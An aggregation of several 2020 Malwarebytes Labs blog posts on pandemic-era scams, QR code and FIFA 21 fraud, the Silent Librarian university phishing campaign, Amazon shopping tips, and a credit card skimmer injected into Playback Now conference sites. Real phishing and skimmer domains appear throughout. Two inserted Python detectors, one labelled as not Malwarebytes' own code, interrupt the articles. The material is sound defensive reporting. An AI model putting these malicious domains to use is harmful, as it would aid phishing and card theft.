  • Now that more people are shopping online to avoid crowded stores, cybercriminals have stepped up their credit card skimming efforts on legitimate sites. In just the first month of sheltering in place, digital skimming was up 26 percent. Users were previously told that a site secured by “https” and a lock icon should be safe. Those rules are now out the window.
  • Threat actors have weaponized information on COVID-19, using it as a hook to lure phishing victims, from SBA scams to nation-state espionage. Just consuming information about COVID-19 from the wrong source, then, could compromise users’ safety.
  • Students are distance learning, often on their own devices. And parents/individuals are mostly working from home, again using their (unprotected) personal devices to conduct work, or work devices to conduct personal errands. Cybercriminals look to capitalize on these risky choices by targeting employees on insecure devices and infiltrating business/school networks in the process.

“I think the biggest threat from Covid fatigue comes down to the massive distraction it causes,” said Adam Kujawa, Director of Malwarebytes Labs. “People who are so desperate for hope might scrutinize less and end up falling into a trap or exposing themselves to cyberthreats, just for the idea of relief.”

Combine this with the general malaise brought on by Covid fatigue, and you get an exponentially higher chance of infecting your home and business networks, rendering your devices obsolete, having your PII stolen and sold on the black market, opening the door for nation-state actors to spy on your organization, or even inviting threat actors to seize company files and ransom them for a hefty price.

How to fight Covid fatigue

If one of the symptoms of fatigue is feeling overwhelmed by a heavy dose of information and advice about what to do to combat a threat, how do you go about giving important information and advice about what to do to combat that threat? One method would be to consider the factors that are causing stress and fatigue and then deliver simple, actionable instructions to counter those factors. For example, if a constantly changing outlook on the future of the pandemic and other mixed messages are creating anxiety, consider only visiting a small selection of websites to find answers.

In researching for this article, I came across dozens of different recommendations for combatting Covid and security fatigue. Rather than overwhelm readers with too many choices, I opted to boil down all instructions to the three most pertinent. For battling Covid fatigue, try:

  1. Turning to a coping mechanism. Take a five minute break from the screen or TV if COVID-19 news is getting you down. If you need more time, spend it consumed in a favorite hobby to re-energize.
  2. Lowering your expectations. This may sound crude, but what it really means is give yourself a break. If you’re forgetting words or taking a long time to complete a project, forgive yourself. And if you think a vaccine will definitely be here in January 2021, perhaps consider placing your hopes elsewhere.
  3. Talking to someone. COVID-19 has been isolating for all of us. When loneliness strikes, schedule a virtual happy hour with a close friend, jump on a phone call with family members, or book an appointment with a trusted counselor.

In addition, remember these key preventative measures for keeping the virus at bay, recommended by leading scientists:

  1. Wear a mask in public. That includes not just stores and workplaces, but at any gathering with people outside your household.
  2. Wash your hands frequently. Especially after being around other people or handling any objects that came from outside your home.
  3. Practice social distancing. When in doubt, stay at least six feet away from others. Refrain from gathering in large groups, especially indoors in poorly-ventilated areas.

And finally, to ensure you don’t let Covid fatigue transform into security fatigue, remember these three important rules:

  1. Use a password manager. To avoid re-using passwords across accounts or having to remember 27 different ones, a password manager will keep your account credentials encrypted inside a digital vault, which can only be opened by a single master password. For extra protection, employ multi-factor authentication.
  2. Use security software on all of your devices, including your mobile phone. (iPhones don’t allow for external antivirus protection, but they do let users download robocall blockers and apps that secure mobile browsers.)
  3. Use common sense. We’ve learned that “trust but verify” doesn’t work for the Internet. If it seems too good to be true…you know the rest.

The post How Covid fatigue puts your physical and digital health in jeopardy appeared first on Malwarebytes Labs.

Categories: Malware Bytes

QR code scams are making a comeback

Malware Bytes Security - Thu, 10/15/2020 - 8:02am

Just when we thought the QR code was on its way out, the pandemic has led to a return of the scannable shortcut. COVID-19 has meant finding a digital equivalent to things normally handed out physically, like menus, tour guides, and other paperwork, and many organizations have adopted the QR code to help with this. And so, it would seem, have criminals. Scammers have dusted off their book of tricks that abuse QR codes, and we’re starting to see new scams. Or maybe just old scams in new places.

What is a QR code again?

A quick recap for those that missed it. A Quick Response (QR) code is nothing more than a two-dimensional barcode. This type of code was designed to be read by robots that keep track of items in a factory. As a QR code takes up a lot less space than a legacy barcode, its usage soon spread.

Smartphones can easily read QR codes—all it takes is a camera and a small piece of software. Some apps, like banking apps, have QR code-reading software incorporated to make it easier for users to make online payments. In some other cases, QR codes are used as part of a login procedure.

QR codes are easy to generate and they are hard to tell apart. To most human eyes, they all look the same. More or less like this:

[Image: an example QR code]

Why are QR codes coming back?

For some time, these QR codes were mainly in use in industrial environments to help keep track of inventory and production. Later they gained some popularity among advertisers because it was easier for consumers to scan a code than to type a long URL. But people couldn’t tell from a QR code where scanning would lead them, so they got cautious and QR codes started to disappear. Then along came the pandemic and entrepreneurs had to get creative about protecting their customers against a real life virus infection.

To name an example, for fear of spreading COVID-19 through many people touching the same menu in a restaurant, businesses placed QR codes on their tables so customers could scan the code and open the menu in the browser on their phone. Clean and easy. Unless a previous visitor with bad intentions had replaced the QR code with his own. Enter QR code scams.

Some known QR code scams

The easiest QR code scam to pull off is clickjacking. Some people get paid to lure others into clicking on a certain link. What better way than to replace QR codes on a popular monument, for example, where people expect to find background information about the landmark by following the link in the QR code. Instead, the replaced QR code takes them to a sleazy site and the clickjacking operator gets paid his fee.

Another trick is the small advance payment scam. For some services, it’s accepted as normal to make an advance payment before you can use that service. For example, to rent a shared bike, you are asked to make a small payment to open the lock on the bike. The QR code to identify the bike and start the payment procedure is printed on the bike. But the legitimate QR codes can be replaced by criminals that are happy to receive these small payments into their own account.

Phishing links can just as easily be disguised as QR codes. Phishers place QR codes where it makes sense for the user. So, for example, if someone is expecting to login to start a payment procedure or to get access to a certain service, the scammers may place a QR code there. We’ve also seen phishing mails equipped with fraudulent QR codes.

Image courtesy of Proofpoint

The email shown above instructed the receiver to install the “security app” from their bank to avoid their account being locked down. However, it pointed to a malicious app outside of the webstore. The user had to allow installs from an unknown source to do this, which should have been a huge red flag, but still some people fell for it.

Lastly, there’s the redirect payments scam, which was used by a website that facilitated Bitcoin payments. While the user entered a Bitcoin address as the receiver, the website generated a QR code for a different Bitcoin address to receive the payment. It’s yet another scam that demonstrates that QR codes are too hard for humans to read.

How to avoid QR code scams

There are a few common-sense methods to avoid the worst QR code scams:

  • Do not trust emails from unknown senders.
  • Do not scan a QR code embedded in an email. Treat them the same as links because, well, that’s what they are.
  • Check to see whether a different QR code sticker was pasted over the original and, if so, stay away from it. Or better yet, ask if it’s OK to remove it.
  • Use a QR scanner that checks or displays the URL before it follows the link.
  • Use a scam blocker or web filter on your device to protect you against known scams.

Even if the mail from a bank looks legitimate, you should at least double-check with the bank (using a contact number you’ve found on a letter or their website) if they ask you to log in on a site other than their own, install software, or pay for something you haven’t ordered.

As an extra precaution, do not use your banking app to scan QR codes if they fall outside of the normal pattern of a payment procedure.

Do I want to know what’s next?

Maybe not, but forewarned is forearmed. One method in development to replace QR codes on Android devices is the Near Field Communication (NFC) tag. NFC tags, like QR codes, do not require an app to read them on more modern devices. Most of the recent iPhones and Androids can read third-party NFC tags without requiring extra software, although older models may need an app to read them.

NFC tags are also impossible to read by humans but they do require an actual presence, i.e. they can’t be sent by mail. But with the rise in popularity of contactless payments, we may see more scams focusing on this type of communication.

Stay safe, everyone!

The post QR code scams are making a comeback appeared first on Malwarebytes Labs.

Categories: Malware Bytes

FIFA 21 game scams: watch out for unsporting conduct

Malware Bytes Security - Wed, 10/14/2020 - 11:30am

Despite COVID-19, soccer season is slowly ebbing its way back into daily life around the world. It’s also sneaking back onto TV screens in the form of huge-budget video games. Step up to the plate, FIFA 21.

FIFA games: the football juggernaut

The FIFA series is an absolute monster in terms of sales, clocking in at around 280 million copies across 51 countries over the lifetime of the franchise. According to the Guinness World Records, it’s the best-selling sports video game franchise in the world. It’s also premium bait for scammers as a result, with an enormous selection of potential victims to choose from. It’s incredibly popular with teens and younger children too, which simply increases the risk from both clever and incredibly basic attacks.

FIFA 21 launched last week, and it’s no doubt selling like hotcakes. If you’re unsure about the risks and what you should steer clear of, you’ve come to the right place. A lot of this depends on the platform, and on how deeply your social media accounts are embedded into your gaming ecosphere. With that out of the way, let’s untangle any confusion you may have and avoid an own goal.

The lay of the land: explaining FIFA mechanics

It’s quite possible your kids own a few of the FIFA titles. You may well hear them talk about coins, or FUT, and speak at length about playing cards. Cards? In my football game? It’s more likely than you think. Before you can fathom the kinds of scams targeting your family members, it helps to understand the inner-workings of the title.

FUT: FIFA Ultimate Team. This is a wildly popular competitive game mode nestled inside various FIFA titles, which involves cards and coins in a continued quest for victory.

Coins: FIFA coins are the in-game currency used to perform various game related buying/selling activities. You earn coins simply by playing the game, completing challenges and objectives.

The coins stay in-game only. You’re not allowed to buy them from third parties, distribute them, or use multiple accounts to direct coins to a “main” account. Giveaways, or performing other actions to obtain coins, are all forbidden.

What do you do with the coins once you have enough of them? You spend them on cards.

Cards: The lifeblood of the game. The cards represent players in your team and come in various levels of quality. The rarer the card, the more coins they probably cost to purchase.

So far, so good…and essentially harmless. Unfortunately, the monetised aspects of the game away from the screen contribute to scammers wanting a piece of the action.

Extra-curricular activities: playing outside the game

You don’t need to spend in-game coins to purchase cards on the transfer market. Gamers can also buy “FIFA points”, sold inside the game, through the relevant store for your gaming platform, or by legitimate sellers. They buy these points with real money, as opposed to virtual currencies. The monetisation of the game is red meat in the water to scammers.

Anything tied up in real world cash immediately offers several inroads to fakery. Arguments against this style of monetisation are also compelling. Desperation for coins / points means potentially being more susceptible to scams.

Common FIFA game scams

Gift generators:

These target the platform you play on. It might be PC, it could be console. They might specify Steam, another store, or even something else altogether. They’ll offer up coins, free game keys, points, activation codes, money, whatever it takes. “All” you have to do is fill in a survey, or hand over your login details, or buy giftcards and send them the codes.

At that point your personal data may be in the hands of third-party marketers, and you may be out of pocket as well. Or you may be dealing with account compromise. You will commonly find these promoted on forums and in YouTube videos.

Fake customer support assistance:

A tactic which has been around for a few years now, and frequently successful. Scammers will often pretend to be customer support reps, then insert themselves into support discussions on social media. The victim eventually lands on a phishing page. While we first came across this targeting FIFA gamers, the tactic was soon observed being used in banking scams too.

Social media fakeouts:

It’s the easiest thing in the world for scammers to create bogus pages on social media. It’s common to see fake accounts on Instagram and Facebook, and as usual the aim is to direct victims to phishing pages. If a major sporting event is taking place, they’ll probably craft banner imagery and general discussion towards said event in order to make it more convincing.

It’s also quite common for them to deploy bots in the comments to make it look as though the website/offer really works. Don’t take dozens of “this is genuine, thank you” messages for granted.

Bogus Direct Messages:

Scammers will pretend to be game admins, or console developers, or promoters. They’ll push the line that you’ve been selected for a special in-game reward, or a points offer. A technical issue may have occurred, and they need your login details to verify “something”. Perhaps they’ll claim your account has been restricted, and jumping through their hoops is the only way you’ll get your account back.

Whatever they claim, rest assured it’s all going to be nonsense. Nobody should ever ask for login credentials, and especially not in such casual fashion. All attempts sent your way should be blocked and reported on your platform. This will help to keep other people safe, too.

An increasingly wide playing field

EA titles recently returned to Steam, having been absent for some years. As each gaming platform has its own set of security protocols, parents and gamers need to keep up with how things work on each.

In a recent interview with The Daily Swig, I touched on aspects of microtransactions with regards to a rise in attacks during the pandemic lockdown. If you limit the time available for in-game items, or dabble in rarity as a reward, then younger gamers will gravitate towards parents who often hold the digital keys to the kingdom. Buy this, buy that, now buy six more of these.

What this means in practice is endlessly jumping into one or more email accounts to authorise logins, transactions, trades, and more. Those accounts may also require several steps of authentication to log in. Eventually, some parents will simply drop some security features in order to make things less of a hoop-jumping exercise.

At that point, the accounts are now vulnerable to attack. Streamlining games which require multiple platform logins, authentication, in-game validation, and email activity on a regular basis isn’t easy and that’s what scammers rely on.

Blow the whistle, referee

Whether your game of choice is FIFA or something else entirely, keep the above tips in mind. Ensure you’re aware of the latest FIFA scams doing the rounds and take some time to figure out security practices that work for you on your selected platform. Every small step you make towards keeping scammers out makes it harder for them to score the winning goal.

The post FIFA 21 game scams: watch out for unsporting conduct appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Silent Librarian APT right on schedule for 20/21 academic year

Malware Bytes Security - Wed, 10/14/2020 - 9:29am

A threat actor known as Silent Librarian/TA407/COBALT DICKENS has been actively targeting universities via spear phishing campaigns since schools and universities went back.

We were initially tipped off by one of our customers, and were able to identify a new active campaign from this APT group. Based on the number of intended victims, we can tell that Silent Librarian does not limit itself to specific countries but tries to get wider coverage.

Even though many phishing sites have been identified and taken down, the threat actor has built enough of them to continue with a successful campaign against staff and students alike.

A persistent threat actor with a perfect attendance record

In March 2018, nine Iranians were indicted by the US Department of Justice for conducting attacks against universities and other organizations with the goal of stealing research and proprietary data.

Yet, both in August 2018 and 2019 Silent Librarian was lining up for the new academic years, once again targeting the same kind of victims in over a dozen countries.

IT administrators working at universities have a particularly tough job considering that their customers, namely students and teachers, are among the most difficult to protect due to their behaviors. Despite that, they also contribute to and access research that could be worth millions or billions of dollars.

Considering that Iran is dealing with constant sanctions, it strives to keep up with world developments in various fields, including that of technology. As such, these attacks represent a national interest and are well funded.

Same pattern in phishing domain registration

The new domain names follow the same pattern as previously reported, except that they swap the top-level domain for another. We know that the threat actor has used the “.me” TLD in their past campaigns against some academic institutions, and this is still the case, alongside “.tk” and “.cf”.

Phishing site                     Legitimate                  Target
blackboard.stonybrook.ernn.me     blackboard.stonybrook.edu   Stony Brook University
blackboard.stonybrook.nrni.me     blackboard.stonybrook.edu   Stony Brook University
uu.blackboard.rres.me             uu.blackboard.com           Universiteit Utrecht

Table 1: List of phishing sites and targets

Registering these subdomains to perform phishing attacks against universities is a known behavior for this APT group and therefore we can expect that they were registered by the same actor.
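To make that registration pattern usable for detection, here is an added example (not Malwarebytes' code) that flags hostnames reusing a known portal hostname as the leading labels of a subdomain under an unrelated domain, and runs it over proxy-log lines. The two legitimate portals come from the page; the log lines, timestamps, client IPs and the example.org entry are constructed, and the registrable-domain split is deliberately naive (last two labels, no public-suffix list).

```python
"""Added example: spot lookalike phishing hostnames built on a real university portal."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Legitimate portals a defender wants to protect (both named on the page).
LEGIT_PORTALS: dict[str, str] = {
    "blackboard.stonybrook.edu": "Stony Brook University",
    "uu.blackboard.com": "Universiteit Utrecht",
}

# TLDs the post attributes to the actor; a match raises confidence but is not required.
ACTOR_TLDS = frozenset({"me", "tk", "cf"})

# Constructed proxy-log lines for the demo (timestamps, client IPs and example.org are made up).
SAMPLE_LOG = """\
2020-10-14T09:29:01Z 10.0.0.21 GET https://blackboard.stonybrook.edu/webapps/login/ 200
2020-10-14T09:29:07Z 10.0.0.34 GET https://blackboard.stonybrook.ernn.me/webapps/login/ 200
2020-10-14T09:30:12Z 10.0.0.34 GET https://uu.blackboard.rres.me/ 200
2020-10-14T09:31:45Z 10.0.0.51 GET https://blackboard.stonybrook.nrni.me/ 200
2020-10-14T09:32:00Z 10.0.0.60 GET https://uu.blackboard.com/ 200
2020-10-14T09:33:19Z 10.0.0.60 GET https://example.org/blackboard.stonybrook.edu 200
"""


@dataclass(frozen=True)
class Finding:
    hostname: str            # suspicious hostname seen in traffic
    impersonates: str        # legitimate portal it copies
    target: str              # institution being phished
    registrable_domain: str  # attacker-controlled domain the labels hang off
    actor_tld: bool          # True if the TLD is one the post attributes to the actor


def _labels(hostname: str) -> list[str]:
    return hostname.lower().strip(".").split(".")


def classify_hostname(hostname: str, portals: dict[str, str] = LEGIT_PORTALS) -> Finding | None:
    """Return a Finding if hostname looks like a lookalike of a known portal.

    Rule: the legitimate portal minus its TLD (e.g. 'blackboard.stonybrook')
    must be an exact leading label sequence, and what follows must be at least
    two labels (an attacker-registered domain such as 'ernn.me'). The genuine
    portal itself (tail is just 'edu' or 'com') is therefore never flagged.
    """
    cand = _labels(hostname)
    for portal, target in portals.items():
        brand = _labels(portal)[:-1]          # drop the genuine TLD
        tail = cand[len(brand):]
        if cand[:len(brand)] != brand or len(tail) < 2:
            continue
        reg = ".".join(tail[-2:])             # naive registrable domain (no public-suffix list)
        if reg == ".".join(_labels(portal)[-2:]):
            continue                          # same owner as the genuine portal
        return Finding(hostname.lower(), portal, target, reg, tail[-1] in ACTOR_TLDS)
    return None


_HOST_RE = re.compile(r"https?://([^/\s:]+)")


def scan_log(text: str, portals: dict[str, str] = LEGIT_PORTALS) -> list[Finding]:
    """Extract hostnames from URL fields in log lines and classify each one once."""
    findings: list[Finding] = []
    seen: set[str] = set()
    for m in _HOST_RE.finditer(text):
        host = m.group(1).lower()
        if host in seen:
            continue
        seen.add(host)
        finding = classify_hostname(host, portals)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.hostname:32} mimics {f.impersonates} ({f.target}); "
              f"registered under {f.registrable_domain}; actor TLD: {f.actor_tld}")
```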

Figure 1: Phishing site for the University of Adelaide

Phishing sites hosted in Iran

The threat actor uses Cloudflare for most of their phishing hostnames in order to hide the real hosting origin. However, with some external help we were able to identify some of their infrastructure located on Iran-based hosts.

It may seem odd for an attacker to use infrastructure in their own country, possibly pointing a finger at them. However, here it simply becomes another bulletproof hosting option based on the lack of cooperation between US or European law enforcement and local police in Iran.

Figure 2: Part of the phishing infrastructure showing connections with Iran

Clearly we only uncovered a small portion of this phishing operation. Although for the most part the sites are taken down quickly, the attacker has the advantage of being one step ahead and is going for many possible targets at once.

We are continuing to monitor this campaign and are keeping our customers safe by blocking the phishing sites.

Indicators of Compromise (IOCs)



The post Silent Librarian APT right on schedule for 20/21 academic year appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Amazon Prime Day—8 tips for safer shopping

Malware Bytes Security - Tue, 10/13/2020 - 6:11am

Avid Amazon Prime Day shoppers may have been worried they’d missed it this year—thanks coronavirus. Fear not, last month Amazon announced Prime Day will take place three months after its original annual date, beginning today. And this year, it’ll take place over two days, rather than one.

This could mark the beginning of early “peak season” holiday shopping, which usually happens a week before Thanksgiving.

That said, it’s time to brush up on our cybersecurity wits so we can shop early, safely, and save ourselves future headaches in the new shopping season.

How to shop Amazon Prime Day the practical and cyber-sensible way

1. Secure your Amazon Prime account

You can do this by setting up two-factor authentication (2FA)—if you haven’t already done it. Many websites these days already have a secondary means to authenticate either a session or the user. As an Amazon user, you should know that Amazon has been using this security feature for a long time now. If you’re not aware of this, go to your local Amazon Help & Customer Service page and search for “two-factor authentication” to get yourself started.

2. Use only your credit card when buying online

When it comes to which card to use when buying things online, you cannot go wrong with using a credit card over a debit card. Why? Because credit cards have fraud protection in place whereas bank cards, often, don’t have any.

3. Use Amazon’s official app

You can download this from both the Google Play and Apple App stores. Not only would doing so be convenient, it’s also safer, as long as you’re using the legitimate one of course. It’s safe to assume that cybercriminals wouldn’t pass up on Prime Day, whether the date had been moved this year or not, given that Amazon is such a household name they can bank on.

4. Use your Alexa to shop

This may sound counterintuitive, given that we cannot stress enough how vulnerable and insecure IoT devices are. But you can still use your Alexa to shop, just make sure you do it with security and privacy in mind. By this, we mean Alexa shouldn’t be activated straight away, from the box into the boudoir. So make sure you take the time and effort to set up your personal assistant based on the level of privacy you want the device to give you. Here are several points to consider:

  • Make sure you secure your home network first.
    • Have you changed the default name of your home Wi-Fi?
    • Is your router firewall enabled?
    • Are you using the router’s default credentials?
    • Is your wireless network password the strongest you can make it?
    • Is your router’s firmware updated?
    • Have you disabled router features you don’t really need or use?
  • Manage Alexa’s voice recording.
    • You can do this by setting it to automatically delete voice recordings at the earliest setting, which is 3 months. If you think this is too long, you can manually delete the recordings yourself.
  • Disable the feature that allows users to improve Alexa’s transcription capabilities.
  • Lock certain voice purchase commands behind a PIN.
  • Turn off your Alexa (or its microphone) when not in use.

5. Buy only from sellers you are comfortable buying products from

This may seem like an easy decision, but when you’re already on your computer or phone and see something you really want—which isn’t on your shopping list, by the way—make sure your want doesn’t blind you to the seller’s reputation. When you find yourself in this position, ask yourself these questions: Would it really be such a hassle for me if I check what other buyers have to say about this seller first before I buy something from them? Do the reviews seem to have come from actual buyers and not paid reviewers? How long has this supplier been selling on Amazon? Is this deal too good to be true?

6. Get to know Amazon’s policies

If you encounter a suspicious email, call, text message, or webpage claiming to be from Amazon or someone associated with the company, would you know what to do? Familiarize yourself with Amazon’s policies so you can stay one step ahead of the scammers.

7. Use a VPN, especially when you’re shopping on-the-go

Everyone knows that public Wi-Fi is generally considered dicey. As such, users are advised to connect to public Wi-Fi with caution, or else run the risk of compromising their privacy, along with their credentials and personally identifiable information (PII). One way to address this is to use a VPN on a secured (password-protected, in other words) public network. The caveat here, of course, is that you should pick a mobile VPN app that doesn’t just talk the talk.

The other way is to not shop on-the-go at all.

8. Familiarize yourself with potential scams that are aimed at Amazon users like you

Knowing is half the battle. Read up and remind yourself that a known cybercriminal modus operandi (MO) is to target users who aren’t aware and/or who seem to not care about their security and privacy. Once you have an idea of their MO, you’re more likely to be on the lookout and, in turn, avoid the scams.

9. Security beyond Prime Day

Shopping season is unlikely to end with Prime Day, and neither should our vigilance as online shoppers. This way, we can keep our data and PII as secure and far away from the grasp of online criminals as possible. Amazon is one of the many platforms we use to shop, but what we have outlined here can be tweaked to apply to others.

Have a happy, exciting, and safe shopping journey ahead!

The post Amazon Prime Day—8 tips for safer shopping appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Lock and Code S1Ep17: Journalism’s role in cybersecurity with Alfred Ng and Seth Rosenblatt

Malware Bytes Security - Mon, 10/12/2020 - 11:00am

Most everything about cybersecurity—the threats, the vulnerabilities, the breaches and the blunders—doesn’t happen in a vacuum. And the public doesn’t learn about those things because threat actors advertise their exploits, or because companies trumpet their lackluster data security practices.

No, we often learn about cybersecurity issues because of reporting. And as the years have progressed, the stories have only become more intertwined into our everyday lives. We learn whether our products are safe to use, we read about how to safely browse online, and we try to understand why an app might suddenly disappear from the Apple App Store.

To help us better understand the role of journalism in cybersecurity—how the public’s attention has broadened over many years, how a cybersecurity threat is deemed newsworthy, and how to avoid advice that serves no one—we’re talking today to Alfred Ng, senior reporter for CNET, and Seth Rosenblatt, editor-in-chief for The Parallax. 

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:
  • A mobile network operator falls into the hands of Fullz House Magecart group.
  • A fileless APT attack abuses Windows Error Reporting service using a ‘your right to compensation’ lure.
  • The risky business stemming from the fact that a majority of people use work devices for personal use.
  • An update about the state of healthcare security instigated by a case in Germany where a woman died as a result of a ransomware attack.
  • More credit card skimmers; this time the target was a virtual conference platform.

Other cybersecurity news:
  • A new AI software tool to be developed for the U.S. Air Force and Special Operations Command may help to counter disinformation. (Source: Defense One)
  • Hackers have launched a sprawling, multifaceted cyber-attack against the state of Washington, according to two people familiar with the matter. (Source: Bloomberg)
  • The United States has seized 92 domain names that were unlawfully used by Iran’s Islamic Revolutionary Guard Corps (IRGC) to engage in a global disinformation campaign. (Source: US Department of Justice)
  • Sam’s Club has started sending automated password reset emails and security notifications to customers who were hacked in credential stuffing attacks. (Source: BleepingComputer)
  • The International Maritime Organization (IMO), a fully fledged United Nations entity, has become the latest high profile shipping victim of a cyber attack. (Source: Splash 247)

Stay safe, everyone!

The post Lock and Code S1Ep17: Journalism’s role in cybersecurity with Alfred Ng and Seth Rosenblatt appeared first on Malwarebytes Labs.


Credit card skimmer targets virtual conference platform

Malware Bytes Security - Thu, 10/08/2020 - 3:57pm

We’ve seen many security incidents affecting different websites simultaneously because they were loading the same tampered piece of code. In many instances, this is due to what we call a supply-chain attack, where a threat actor targets one company that acts as an intermediary to others.

In today’s case, the targeted websites all reside on the same server and sell video content from various conferences and conventions. The host control panel belongs to Playback Now, a company that provides its customers with an array of services to capture and deliver recorded material into an online conference experience.

Criminals decided to impersonate Playback Now by registering a malicious domain lexically close to their official website that could be used to discreetly serve a credit card skimmer as well as collect stolen data.

Their next move was to inject a malicious reference to this skimmer code into dozens of Magento sites hosted on the same IP address belonging to Playback Now. As a result, the financial details from customers shopping for conference material were now at risk.

Online conference sites compromised with Inter skimming kit

Playback Now provides organizations with an easy way to seamlessly convert an event into an online virtual experience. Conferences and seminars can be delivered via live streaming, on demand, or a hybrid of the two.

Their offering of a virtual conference expo hall seems like a timely solution during the pandemic for organizers and exhibitors to connect with customers just like at an in-person event.

Businesses or organizations that want to join the experience can get a dedicated website from where they will serve and promote their content. Take the following website built for the Association of Healthcare Internal auditors.

Once users have registered and purchased one of the packages, they can access recorded sessions online or save them onto a flash drive.

A closer look at the website’s source code reveals an external reference to a JavaScript file. It would be easy to overlook, thinking it is served from the legitimate Playback Now website, but there is an extra ‘s’ in that domain name (playbacknows[.]com) that gives it away.

That domain was registered only a couple of weeks ago and its home page is void of any content.

Domain name:
Creation Date: 2020-09-21T20:22:10.00Z
Registrar: NAMECHEAP INC
Registrant Name: WhoisGuard Protected
Registrant Street: P.O. Box 0823-03411
Registrant City: Panama

In total, we detected the reference to this domain in over 40 websites belonging to different organizations (see the IOCs section of this blogpost).

This JavaScript is a skimmer that has been lightly obfuscated and contains a number of strings that are a common marker of the Inter skimming kit.

When someone purchases a course or conference recording, their personal and credit card data will be leaked to criminals via the same malicious domain housing the skimmer.
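The lookalike-domain trick described above is mechanically detectable: compare the registrable domain of every external script against the domains a site is expected to load from. The following Python is an added example, not code from the Malwarebytes post; the checkout page it scans is constructed, and apart from playbacknow[.]com and playbacknows[.]com the hosts in it are made up.

```python
"""
Flag <script src> references whose registrable domain is a one-character
lookalike of a trusted domain, the way playbacknows.com impersonated
playbacknow.com. Constructed sample input; no network access needed.
"""
import re
from urllib.parse import urlparse

# Matches the src attribute of a <script> tag (single or double quoted)
SCRIPT_SRC_RE = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


def within_one_edit(a: str, b: str) -> bool:
    """True if a and b are equal or differ by exactly one insertion,
    deletion or substitution (a bounded Levenshtein check)."""
    if a == b:
        return True
    if abs(len(a) - len(b)) > 1:
        return False
    if len(a) < len(b):
        a, b = b, a                      # make a the longer string
    i = j = edits = 0
    while i < len(a) and j < len(b):
        if a[i] == b[j]:
            i += 1
            j += 1
            continue
        edits += 1
        if edits > 1:
            return False
        i += 1                           # skip the extra/changed char in a
        if len(a) == len(b):
            j += 1                       # a substitution consumes one of b too
    # Any character of a left unconsumed is one more edit (b is exhausted)
    return edits + (len(a) - i) <= 1


def registrable_domain(host: str) -> str:
    """Last two labels of a hostname. Simplification (assumption): no
    public-suffix list, so example.co.uk style domains are not handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def find_lookalike_scripts(html: str, trusted_domains):
    """Return (src, host, trusted_domain) for each external script loaded
    from a one-edit lookalike of a trusted domain."""
    findings = []
    for src in SCRIPT_SRC_RE.findall(html):
        absolute = "https:" + src if src.startswith("//") else src
        host = urlparse(absolute).hostname
        if not host:
            continue  # relative path: same-origin script, nothing to compare
        domain = registrable_domain(host)
        for trusted in trusted_domains:
            if domain != trusted and within_one_edit(domain, trusted):
                findings.append((src, host, trusted))
    return findings


# Constructed checkout page: first script is the legitimate host, the last
# one is the lookalike domain named in the post.
SAMPLE_HTML = """
<html><head>
<script type="text/javascript" src="https://naraei.playbacknow.com/js/cart.js"></script>
<script src="//code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="/skin/frontend/default/js/checkout.js"></script>
<script type='text/javascript' src='https://playbacknows.com/js/jquery.min.js'></script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for src, host, trusted in find_lookalike_scripts(SAMPLE_HTML, ["playbacknow.com"]):
        print(f"LOOKALIKE {host} (mimics {trusted}): {src}")
```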

Breach possibly related to Magento 1.x exploit

All affected Playback Now customer sites are running on the same IP address. Using VirusTotal Graph, we can see an interesting connection with a piece of malware we previously documented.

This GoLang sample attempts to brute-force access into a variety of Content Management Systems. If successful, attackers could use the gained credentials to inject malicious code into e-commerce sites.

This connection was interesting but lost some value when we looked at the submission date for this sample to VirusTotal. It’s quite likely that the server was pinged just like many others, but it’s unclear whether it would have resulted in a breach, even at a later date.

Based on an analysis of the compromised Playback Now related sites, we found they were running a vulnerable version of the Magento CMS, namely version 1.x. Following the release of an exploitation tool, a wave of attacks was recently observed, compromising over two thousand sites.

Given the timeline, this incident could have been leveraging the same exploit and be carried out by the same or perhaps a different group.

The official website is hosted on that same IP address as well, but it does not appear to be compromised. One thing to note, though, is that it is running a different CMS, namely WordPress version 5.4.

We contacted Playback Now to report this breach. In the meantime, Malwarebytes Browser Guard detects and blocks the fraudulent skimmer domain.

Indicators of Compromise (IOCs)



Compromised sites


Server hosting compromised sites

The post Credit card skimmer targets virtual conference platform appeared first on Malwarebytes Labs.


Healthcare security update: death by ransomware, what’s next?

Malware Bytes Security - Thu, 10/08/2020 - 11:30am

A recent ransomware attack which played a significant role in the death of a German woman has put into focus both the dangers and the importance of cybersecurity today. But it has also led some to point fingers as to who was responsible.

As usual, playing the blame game helps no one, but it does remind us of the dire need to work on healthcare security.

What happened?

A few weeks ago, the university hospital Uniklinikum in the German city of Düsseldorf suffered a ransomware attack. The hospital decided not to admit new patients until it resolved the situation and restored normal operations.

Because of the admissions stop, a woman in need of immediate help had to be driven to the hospital of Wuppertal which is about 20 miles further. Unfortunately, she died upon arrival. The extra 30 minutes it took to get her to the next hospital turned out to be fatal.

As it turned out, the target of the ransomware gang was not even the hospital, but the university the hospital belongs to. When the attackers learned that the hospital had fallen victim as well, they handed over the decryption key for free. Despite that key, it took the hospital more than two weeks to reach a level of operability that allowed them to take on new patients.

This is not only tragic because the woman might have been saved if the university hospital had been operational, but also because it demonstrates once more how one of the most important parts of our infrastructure is lacking adequate defenses against prevalent threats like ransomware.

What are the main problems facing healthcare security?

In the past we have identified several elements that make the healthcare industry, and hospitals in particular, more vulnerable to cyberthreats than many other verticals.

Here are some of those problem elements:

  • The Internet of Things (IoT): Due to their nature and method of use, you will find a lot of IoT devices in hospitals that all run on different operating systems and require specific security settings in order to shield them from the outside world.
  • Legacy systems: Quite often, older equipment will not run properly under newer operating systems which results in several systems that are running on an outdated OS and even on software that has reached the end-of-life point. This means that the software will no longer receive patches or updates even when there are known issues.
  • Lack of adequate backups: Even when the underlying problem has been resolved, it can take far too long for an attacked target to get back to an operational state. Institutes need to at least have a backup plan and maybe even backup equipment and servers for the most vital functions so they can keep them running when disaster strikes.
